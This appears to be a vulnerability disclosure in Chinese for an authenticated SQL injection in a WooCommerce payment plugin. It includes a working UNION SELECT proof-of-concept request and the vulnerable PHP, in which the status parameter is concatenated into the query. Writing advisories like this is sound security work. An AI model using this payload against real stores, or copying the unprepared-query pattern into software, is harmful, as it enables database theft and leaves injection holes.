CVE-2025-10142 披露
该仓库披露了 PagSeguro-Connect-para-WooCommerce <= 4.44.3 中的一个漏洞,该插件由 Ricardo Martins 开发。
| CVE ID | 类型 | 组件 | 影响 |
|---|
| CVE-2025-10142 | 已认证(店铺管理员及以上)SQL注入 | src/Connect/Recurring/Admin/Subscriptions/SubscriptionList.php | 已认证攻击者可窃取数据 |
GET /wp-admin/admin.php?page=rm-pagbank-subscriptions&status=' UNION SELECT CAST(version() AS CHAR),2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
status 参数被直接拼接到 SQL 查询中,未进行转义或使用 $wpdb->prepare()
if (!empty($_REQUEST['status'])) {
$status = sanitize_text_field(wp_unslash($_REQUEST['status']));
$where .= " AND status = '$status'";
}
$this->items = $wpdb->get_results(
$wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}pagbank_recurring WHERE $where ORDER BY $orderby $order LIMIT %d OFFSET %d",
$per_page,
($current_page - 1) * $per_page
),
ARRAY_A
);
...
由于可从店铺管理员(Shop Manager)进行攻击,威胁程度相当低。将外部输入放入 $where 中,并直接将 $where 塞入 SQL 语句的处理过程,追踪起来有些困难。
姓名: MooseLove
角色: 独立安全研究员/漏洞猎人
联系方式: 可应要求提供
本公告为公共安全意识而提供。可自由分享,需注明出处。